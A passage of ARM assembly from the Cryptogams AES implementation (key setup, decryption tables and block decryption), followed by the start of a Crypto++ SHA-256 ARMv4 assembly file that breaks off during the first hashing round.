str r0,[r11],#24
eor r2,r2,r1 @ rk[8]=rk[2]^rk[7]
str r1,[r11,#-20]
eor r3,r3,r2 @ rk[9]=rk[3]^rk[8]
str r2,[r11,#-16]
subs r12,r12,#1
str r3,[r11,#-12]
#ifdef __thumb2__
itt eq @ Thumb2 thing, sanity check in ARM
#endif
subeq r2,r11,#216
beq .Ldone
ldr r7,[r11,#-32]
ldr r8,[r11,#-28]
eor r7,r7,r3 @ rk[10]=rk[4]^rk[9]
eor r9,r8,r7 @ rk[11]=rk[5]^rk[10]
str r7,[r11,#-8]
str r9,[r11,#-4]
b .L192_loop
.Lnot192:
#if __ARM_ARCH__<7
ldrb r8,[r12,#27]
ldrb r4,[r12,#26]
ldrb r5,[r12,#25]
ldrb r6,[r12,#24]
orr r8,r8,r4,lsl#8
ldrb r9,[r12,#31]
orr r8,r8,r5,lsl#16
ldrb r4,[r12,#30]
orr r8,r8,r6,lsl#24
ldrb r5,[r12,#29]
ldrb r6,[r12,#28]
orr r9,r9,r4,lsl#8
orr r9,r9,r5,lsl#16
str r8,[r11],#8
orr r9,r9,r6,lsl#24
str r9,[r11,#-4]
#else
ldr r8,[r12,#24]
ldr r9,[r12,#28]
#ifdef __ARMEL__
rev r8,r8
rev r9,r9
#endif
str r8,[r11],#8
str r9,[r11,#-4]
#endif
mov r12,#14
str r12,[r11,#240-32]
add r6,r10,#256 @ rcon
mov lr,#255
mov r12,#7
.L256_loop:
and r5,lr,r9,lsr#24
and r7,lr,r9,lsr#16
ldrb r5,[r10,r5]
and r8,lr,r9,lsr#8
ldrb r7,[r10,r7]
and r9,lr,r9
ldrb r8,[r10,r8]
orr r5,r5,r7,lsl#24
ldrb r9,[r10,r9]
orr r5,r5,r8,lsl#16
ldr r4,[r6],#4 @ rcon[i++]
orr r5,r5,r9,lsl#8
eor r9,r5,r4
eor r0,r0,r9 @ rk[8]=rk[0]^...
eor r1,r1,r0 @ rk[9]=rk[1]^rk[8]
str r0,[r11],#32
eor r2,r2,r1 @ rk[10]=rk[2]^rk[9]
str r1,[r11,#-28]
eor r3,r3,r2 @ rk[11]=rk[3]^rk[10]
str r2,[r11,#-24]
subs r12,r12,#1
str r3,[r11,#-20]
#ifdef __thumb2__
itt eq @ Thumb2 thing, sanity check in ARM
#endif
subeq r2,r11,#256
beq .Ldone
and r5,lr,r3
and r7,lr,r3,lsr#8
ldrb r5,[r10,r5]
and r8,lr,r3,lsr#16
ldrb r7,[r10,r7]
and r9,lr,r3,lsr#24
ldrb r8,[r10,r8]
orr r5,r5,r7,lsl#8
ldrb r9,[r10,r9]
orr r5,r5,r8,lsl#16
ldr r4,[r11,#-48]
orr r5,r5,r9,lsl#24
ldr r7,[r11,#-44]
ldr r8,[r11,#-40]
eor r4,r4,r5 @ rk[12]=rk[4]^...
ldr r9,[r11,#-36]
eor r7,r7,r4 @ rk[13]=rk[5]^rk[12]
str r4,[r11,#-16]
eor r8,r8,r7 @ rk[14]=rk[6]^rk[13]
str r7,[r11,#-12]
eor r9,r9,r8 @ rk[15]=rk[7]^rk[14]
str r8,[r11,#-8]
str r9,[r11,#-4]
b .L256_loop
.align 2
.Ldone: mov r0,#0
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
.Labrt:
#if __ARM_ARCH__>=5
bx lr @ .word 0xe12fff1e
#else
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_AES_set_encrypt_key,.-cryptogams_AES_set_encrypt_key
.globl cryptogams_AES_set_decrypt_key
.type cryptogams_AES_set_decrypt_key,%function
.align 5
cryptogams_AES_set_decrypt_key:
str lr,[sp,#-4]! @ push lr
bl _armv4_AES_set_encrypt_key
teq r0,#0
ldr lr,[sp],#4 @ pop lr
bne .Labrt
mov r0,r2 @ AES_set_encrypt_key preserves r2,
mov r1,r2 @ which is AES_KEY *key
b _armv4_AES_set_enc2dec_key
.size cryptogams_AES_set_decrypt_key,.-cryptogams_AES_set_decrypt_key
@ void cryptogams_AES_set_enc2dec_key(const AES_KEY *inp,AES_KEY *out)
.globl cryptogams_AES_set_enc2dec_key
.type cryptogams_AES_set_enc2dec_key,%function
.align 5
cryptogams_AES_set_enc2dec_key:
_armv4_AES_set_enc2dec_key:
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
ldr r12,[r0,#240]
mov r7,r0 @ input
add r8,r0,r12,lsl#4
mov r11,r1 @ output
add r10,r1,r12,lsl#4
str r12,[r1,#240]
.Linv: ldr r0,[r7],#16
ldr r1,[r7,#-12]
ldr r2,[r7,#-8]
ldr r3,[r7,#-4]
ldr r4,[r8],#-16
ldr r5,[r8,#16+4]
ldr r6,[r8,#16+8]
ldr r9,[r8,#16+12]
str r0,[r10],#-16
str r1,[r10,#16+4]
str r2,[r10,#16+8]
str r3,[r10,#16+12]
str r4,[r11],#16
str r5,[r11,#-12]
str r6,[r11,#-8]
str r9,[r11,#-4]
teq r7,r8
bne .Linv
ldr r0,[r7]
ldr r1,[r7,#4]
ldr r2,[r7,#8]
ldr r3,[r7,#12]
str r0,[r11]
str r1,[r11,#4]
str r2,[r11,#8]
str r3,[r11,#12]
sub r11,r11,r12,lsl#3
ldr r0,[r11,#16]! @ prefetch tp1
mov r7,#0x80
mov r8,#0x1b
orr r7,r7,#0x8000
orr r8,r8,#0x1b00
orr r7,r7,r7,lsl#16
orr r8,r8,r8,lsl#16
sub r12,r12,#1
mvn r9,r7
mov r12,r12,lsl#2 @ (rounds-1)*4
.Lmix: and r4,r0,r7
and r1,r0,r9
sub r4,r4,r4,lsr#7
and r4,r4,r8
eor r1,r4,r1,lsl#1 @ tp2
and r4,r1,r7
and r2,r1,r9
sub r4,r4,r4,lsr#7
and r4,r4,r8
eor r2,r4,r2,lsl#1 @ tp4
and r4,r2,r7
and r3,r2,r9
sub r4,r4,r4,lsr#7
and r4,r4,r8
eor r3,r4,r3,lsl#1 @ tp8
eor r4,r1,r2
eor r5,r0,r3 @ tp9
eor r4,r4,r3 @ tpe
eor r4,r4,r1,ror#24
eor r4,r4,r5,ror#24 @ ^= ROTATE(tpb=tp9^tp2,8)
eor r4,r4,r2,ror#16
eor r4,r4,r5,ror#16 @ ^= ROTATE(tpd=tp9^tp4,16)
eor r4,r4,r5,ror#8 @ ^= ROTATE(tp9,24)
ldr r0,[r11,#4] @ prefetch tp1
str r4,[r11],#4
subs r12,r12,#1
bne .Lmix
mov r0,#0
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_AES_set_enc2dec_key,.-cryptogams_AES_set_enc2dec_key
.type AES_Td,%object
.align 5
AES_Td:
.word 0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96
.word 0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393
.word 0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25
.word 0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f
.word 0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1
.word 0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6
.word 0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da
.word 0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844
.word 0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd
.word 0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4
.word 0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45
.word 0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94
.word 0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7
.word 0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a
.word 0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5
.word 0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c
.word 0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1
.word 0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a
.word 0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75
.word 0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051
.word 0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46
.word 0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff
.word 0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77
.word 0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb
.word 0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000
.word 0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e
.word 0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927
.word 0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a
.word 0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e
.word 0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16
.word 0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d
.word 0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8
.word 0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd
.word 0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34
.word 0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163
.word 0xd731dcca, 0x42638510, 0x13972240, 0x84c61120
.word 0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d
.word 0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0
.word 0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422
.word 0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef
.word 0x87494ec7, 0xd938d1c1, 0x8ccaa2fe, 0x98d40b36
.word 0xa6f581cf, 0xa57ade28, 0xdab78e26, 0x3fadbfa4
.word 0x2c3a9de4, 0x5078920d, 0x6a5fcc9b, 0x547e4662
.word 0xf68d13c2, 0x90d8b8e8, 0x2e39f75e, 0x82c3aff5
.word 0x9f5d80be, 0x69d0937c, 0x6fd52da9, 0xcf2512b3
.word 0xc8ac993b, 0x10187da7, 0xe89c636e, 0xdb3bbb7b
.word 0xcd267809, 0x6e5918f4, 0xec9ab701, 0x834f9aa8
.word 0xe6956e65, 0xaaffe67e, 0x21bccf08, 0xef15e8e6
.word 0xbae79bd9, 0x4a6f36ce, 0xea9f09d4, 0x29b07cd6
.word 0x31a4b2af, 0x2a3f2331, 0xc6a59430, 0x35a266c0
.word 0x744ebc37, 0xfc82caa6, 0xe090d0b0, 0x33a7d815
.word 0xf104984a, 0x41ecdaf7, 0x7fcd500e, 0x1791f62f
.word 0x764dd68d, 0x43efb04d, 0xccaa4d54, 0xe49604df
.word 0x9ed1b5e3, 0x4c6a881b, 0xc12c1fb8, 0x4665517f
.word 0x9d5eea04, 0x018c355d, 0xfa877473, 0xfb0b412e
.word 0xb3671d5a, 0x92dbd252, 0xe9105633, 0x6dd64713
.word 0x9ad7618c, 0x37a10c7a, 0x59f8148e, 0xeb133c89
.word 0xcea927ee, 0xb761c935, 0xe11ce5ed, 0x7a47b13c
.word 0x9cd2df59, 0x55f2733f, 0x1814ce79, 0x73c737bf
.word 0x53f7cdea, 0x5ffdaa5b, 0xdf3d6f14, 0x7844db86
.word 0xcaaff381, 0xb968c43e, 0x3824342c, 0xc2a3405f
.word 0x161dc372, 0xbce2250c, 0x283c498b, 0xff0d9541
.word 0x39a80171, 0x080cb3de, 0xd8b4e49c, 0x6456c190
.word 0x7bcb8461, 0xd532b670, 0x486c5c74, 0xd0b85742
@ Td4[256]
.byte 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
.byte 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
.byte 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
.byte 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
.byte 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
.byte 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
.byte 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
.byte 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
.byte 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
.byte 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
.byte 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
.byte 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
.byte 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
.byte 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
.byte 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
.byte 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
.byte 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
.byte 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
.byte 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
.byte 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
.byte 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
.byte 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
.byte 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
.byte 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
.byte 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
.byte 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
.byte 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
.byte 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
.byte 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
.byte 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
.byte 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
.byte 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
.size AES_Td,.-AES_Td
@ void cryptogams_AES_decrypt_block(const unsigned char *in, unsigned char *out,
@ const AES_KEY *key) {
.globl cryptogams_AES_decrypt_block
.type cryptogams_AES_decrypt_block,%function
.align 5
cryptogams_AES_decrypt_block:
#ifndef __thumb2__
sub r3,pc,#8 @ cryptogams_AES_decrypt_block
#else
adr r3,.
#endif
stmdb sp!,{r1,r4-r12,lr}
#if defined(__thumb2__) || defined(__APPLE__)
adr r10,AES_Td
#else
sub r10,r3,#cryptogams_AES_decrypt_block-AES_Td @ Td
#endif
mov r12,r0 @ inp
mov r11,r2
#if __ARM_ARCH__<7
ldrb r0,[r12,#3] @ load input data in endian-neutral
ldrb r4,[r12,#2] @ manner...
ldrb r5,[r12,#1]
ldrb r6,[r12,#0]
orr r0,r0,r4,lsl#8
ldrb r1,[r12,#7]
orr r0,r0,r5,lsl#16
ldrb r4,[r12,#6]
orr r0,r0,r6,lsl#24
ldrb r5,[r12,#5]
ldrb r6,[r12,#4]
orr r1,r1,r4,lsl#8
ldrb r2,[r12,#11]
orr r1,r1,r5,lsl#16
ldrb r4,[r12,#10]
orr r1,r1,r6,lsl#24
ldrb r5,[r12,#9]
ldrb r6,[r12,#8]
orr r2,r2,r4,lsl#8
ldrb r3,[r12,#15]
orr r2,r2,r5,lsl#16
ldrb r4,[r12,#14]
orr r2,r2,r6,lsl#24
ldrb r5,[r12,#13]
ldrb r6,[r12,#12]
orr r3,r3,r4,lsl#8
orr r3,r3,r5,lsl#16
orr r3,r3,r6,lsl#24
#else
ldr r0,[r12,#0]
ldr r1,[r12,#4]
ldr r2,[r12,#8]
ldr r3,[r12,#12]
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
#endif
bl _cryptogams_armv4_AES_decrypt_block
ldr r12,[sp],#4 @ pop out
#if __ARM_ARCH__>=7
#ifdef __ARMEL__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
#endif
str r0,[r12,#0]
str r1,[r12,#4]
str r2,[r12,#8]
str r3,[r12,#12]
#else
mov r4,r0,lsr#24 @ write output in endian-neutral
mov r5,r0,lsr#16 @ manner...
mov r6,r0,lsr#8
strb r4,[r12,#0]
strb r5,[r12,#1]
mov r4,r1,lsr#24
strb r6,[r12,#2]
mov r5,r1,lsr#16
strb r0,[r12,#3]
mov r6,r1,lsr#8
strb r4,[r12,#4]
strb r5,[r12,#5]
mov r4,r2,lsr#24
strb r6,[r12,#6]
mov r5,r2,lsr#16
strb r1,[r12,#7]
mov r6,r2,lsr#8
strb r4,[r12,#8]
strb r5,[r12,#9]
mov r4,r3,lsr#24
strb r6,[r12,#10]
mov r5,r3,lsr#16
strb r2,[r12,#11]
mov r6,r3,lsr#8
strb r4,[r12,#12]
strb r5,[r12,#13]
strb r6,[r12,#14]
strb r3,[r12,#15]
#endif
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_AES_decrypt_block,.-cryptogams_AES_decrypt_block
.type _cryptogams_armv4_AES_decrypt_block,%function
.align 2
_cryptogams_armv4_AES_decrypt_block:
str lr,[sp,#-4]! @ push lr
ldmia r11!,{r4,r5,r6,r7}
eor r0,r0,r4
ldr r12,[r11,#240-16]
eor r1,r1,r5
eor r2,r2,r6
eor r3,r3,r7
sub r12,r12,#1
mov lr,#255
and r7,lr,r0,lsr#16
and r8,lr,r0,lsr#8
and r9,lr,r0
mov r0,r0,lsr#24
.Ldec_loop:
ldr r4,[r10,r7,lsl#2] @ Td1[s0>>16]
and r7,lr,r1 @ i0
ldr r5,[r10,r8,lsl#2] @ Td2[s0>>8]
and r8,lr,r1,lsr#16
ldr r6,[r10,r9,lsl#2] @ Td3[s0>>0]
and r9,lr,r1,lsr#8
ldr r0,[r10,r0,lsl#2] @ Td0[s0>>24]
mov r1,r1,lsr#24
ldr r7,[r10,r7,lsl#2] @ Td3[s1>>0]
ldr r8,[r10,r8,lsl#2] @ Td1[s1>>16]
ldr r9,[r10,r9,lsl#2] @ Td2[s1>>8]
eor r0,r0,r7,ror#24
ldr r1,[r10,r1,lsl#2] @ Td0[s1>>24]
and r7,lr,r2,lsr#8 @ i0
eor r5,r8,r5,ror#8
and r8,lr,r2 @ i1
eor r6,r9,r6,ror#8
and r9,lr,r2,lsr#16
ldr r7,[r10,r7,lsl#2] @ Td2[s2>>8]
eor r1,r1,r4,ror#8
ldr r8,[r10,r8,lsl#2] @ Td3[s2>>0]
mov r2,r2,lsr#24
ldr r9,[r10,r9,lsl#2] @ Td1[s2>>16]
eor r0,r0,r7,ror#16
ldr r2,[r10,r2,lsl#2] @ Td0[s2>>24]
and r7,lr,r3,lsr#16 @ i0
eor r1,r1,r8,ror#24
and r8,lr,r3,lsr#8 @ i1
eor r6,r9,r6,ror#8
and r9,lr,r3 @ i2
ldr r7,[r10,r7,lsl#2] @ Td1[s3>>16]
eor r2,r2,r5,ror#8
ldr r8,[r10,r8,lsl#2] @ Td2[s3>>8]
mov r3,r3,lsr#24
ldr r9,[r10,r9,lsl#2] @ Td3[s3>>0]
eor r0,r0,r7,ror#8
ldr r7,[r11],#16
eor r1,r1,r8,ror#16
ldr r3,[r10,r3,lsl#2] @ Td0[s3>>24]
eor r2,r2,r9,ror#24
ldr r4,[r11,#-12]
eor r0,r0,r7
ldr r5,[r11,#-8]
eor r3,r3,r6,ror#8
ldr r6,[r11,#-4]
and r7,lr,r0,lsr#16
eor r1,r1,r4
and r8,lr,r0,lsr#8
eor r2,r2,r5
and r9,lr,r0
eor r3,r3,r6
mov r0,r0,lsr#24
subs r12,r12,#1
bne .Ldec_loop
add r10,r10,#1024
ldr r5,[r10,#0] @ prefetch Td4
ldr r6,[r10,#32]
ldr r4,[r10,#64]
ldr r5,[r10,#96]
ldr r6,[r10,#128]
ldr r4,[r10,#160]
ldr r5,[r10,#192]
ldr r6,[r10,#224]
ldrb r0,[r10,r0] @ Td4[s0>>24]
ldrb r4,[r10,r7] @ Td4[s0>>16]
and r7,lr,r1 @ i0
ldrb r5,[r10,r8] @ Td4[s0>>8]
and r8,lr,r1,lsr#16
ldrb r6,[r10,r9] @ Td4[s0>>0]
and r9,lr,r1,lsr#8
add r1,r10,r1,lsr#24
ldrb r7,[r10,r7] @ Td4[s1>>0]
ldrb r1,[r1] @ Td4[s1>>24]
ldrb r8,[r10,r8] @ Td4[s1>>16]
eor r0,r7,r0,lsl#24
ldrb r9,[r10,r9] @ Td4[s1>>8]
eor r1,r4,r1,lsl#8
and r7,lr,r2,lsr#8 @ i0
eor r5,r5,r8,lsl#8
and r8,lr,r2 @ i1
ldrb r7,[r10,r7] @ Td4[s2>>8]
eor r6,r6,r9,lsl#8
ldrb r8,[r10,r8] @ Td4[s2>>0]
and r9,lr,r2,lsr#16
add r2,r10,r2,lsr#24
ldrb r2,[r2] @ Td4[s2>>24]
eor r0,r0,r7,lsl#8
ldrb r9,[r10,r9] @ Td4[s2>>16]
eor r1,r8,r1,lsl#16
and r7,lr,r3,lsr#16 @ i0
eor r2,r5,r2,lsl#16
and r8,lr,r3,lsr#8 @ i1
ldrb r7,[r10,r7] @ Td4[s3>>16]
eor r6,r6,r9,lsl#16
ldrb r8,[r10,r8] @ Td4[s3>>8]
and r9,lr,r3 @ i2
add r3,r10,r3,lsr#24
ldrb r9,[r10,r9] @ Td4[s3>>0]
ldrb r3,[r3] @ Td4[s3>>24]
eor r0,r0,r7,lsl#16
ldr r7,[r11,#0]
eor r1,r1,r8,lsl#8
ldr r4,[r11,#4]
eor r2,r9,r2,lsl#8
ldr r5,[r11,#8]
eor r3,r6,r3,lsl#24
ldr r6,[r11,#12]
eor r0,r0,r7
eor r1,r1,r4
eor r2,r2,r5
eor r3,r3,r6
sub r10,r10,#1024
ldr pc,[sp],#4 @ pop and return
.size _cryptogams_armv4_AES_decrypt_block,.-_cryptogams_armv4_AES_decrypt_block
|
Akhil-Sharma-26/yeet
| 59,489
|
external/cryptopp/sha256_armv4.S
|
@ Copyright 2007-2019 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, MAY 2019: Begin defines from taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
# define CRYPTOGAMS_ARMV7_NEON (1<<0)
@ JW, MAY 2019: End defines from taken from arm_arch.h
@ Back to original Cryptogams code
#if defined(__thumb2__)
.syntax unified
.thumb
#else
.code 32
#endif
.text
.type K256,%object
.align 5
K256:
.word 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
.word 0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
.word 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
.word 0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
.word 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
.word 0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
.word 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
.word 0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
.word 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
.word 0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
.word 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
.word 0xd192e819,0xd6990624,0xf40e3585,0x106aa070
.word 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
.word 0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
.word 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
.word 0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
.size K256,.-K256
.word 0 @ terminator
.align 5
.globl cryptogams_sha256_block_data_order
.type cryptogams_sha256_block_data_order,%function
cryptogams_sha256_block_data_order:
.Lcryptogams_sha256_block_data_order:
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r3,pc,#8 @ cryptogams_sha256_block_data_order
#else
adr r3,.Lcryptogams_sha256_block_data_order
#endif
add r2,r1,r2,lsl#6 @ len to point at the end of inp
stmdb sp!,{r0,r1,r2,r4-r11,lr}
ldmia r0,{r4,r5,r6,r7,r8,r9,r10,r11}
sub r14,r3,#256+32 @ K256
sub sp,sp,#16*4 @ alloca(X[16])
.Loop:
# if __ARM_ARCH__>=7
ldr r2,[r1],#4
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ magic
eor r12,r12,r12
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 0
# if 0==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r8,r8,ror#5
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r8,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 0
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 0==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r8,r8,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r8,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r11,r11,r2 @ h+=X[i]
str r2,[sp,#0*4]
eor r2,r9,r10
add r11,r11,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r8
add r11,r11,r12 @ h+=K256[i]
eor r2,r2,r10 @ Ch(e,f,g)
eor r0,r4,r4,ror#11
add r11,r11,r2 @ h+=Ch(e,f,g)
#if 0==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 0<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r4,r5 @ a^b, b^c in next round
#else
ldr r2,[sp,#2*4] @ from future BODY_16_xx
eor r12,r4,r5 @ a^b, b^c in next round
ldr r1,[sp,#15*4] @ from future BODY_16_xx
#endif
eor r0,r0,r4,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r7,r7,r11 @ d+=h
eor r3,r3,r5 @ Maj(a,b,c)
add r11,r11,r0,ror#2 @ h+=Sigma0(a)
@ add r11,r11,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
